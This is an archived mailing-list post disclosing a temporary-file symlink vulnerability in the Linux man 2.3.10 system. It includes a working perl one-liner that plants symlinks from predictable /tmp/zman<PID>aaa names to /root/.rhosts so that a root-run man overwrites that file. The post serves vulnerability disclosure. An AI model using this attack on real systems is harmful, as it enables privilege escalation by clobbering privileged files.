man problem

• Messages sorted by: [ date ][ thread ][ subject ][ author ]
• Next message: d: "Re: man problem"
• Previous message: Alan Brown: "Re: Crashing an XTACACS authentication server"
• Next in thread: d: "Re: man problem"

I just noticed a problem with the man system (version 2.3.10) on my Linux
box: /usr/man contains the .gz'd man pages:

(from /usr/man/man1:)

-rw-r--r-- 1 root root 1684 Sep 28 1995 cp.1.gz
-rw-r--r-- 1 root root 4063 Dec 29 1995 cpio.1.gz
-rw-r--r-- 1 root root 42 Oct 17 1996 cpp.1.gz

When I execute man, a temporary file containing the un-zipped manpage is
created in /tmp. The name of the tmp-file usually is "zman<PID>aaa",
e.g. "zman10849aaa". This can be exploited with a simple symlink attack:

perl -e 'for($i=8000;$i<12000;$i++){`ln -s /root/.rhosts /tmp/zman${i}aaa`;}'

So when root executes man here and the pid of the man process falls in the
range 8000-11999... you know the rest.

--
     regards,                                               (o_
      Thomas Fischbacher -  tf@physik.tu-muenchen.de        //\
                                                            V_/_

• Next message: d: "Re: man problem"
• Previous message: Alan Brown: "Re: Crashing an XTACACS authentication server"
• Next in thread: d: "Re: man problem"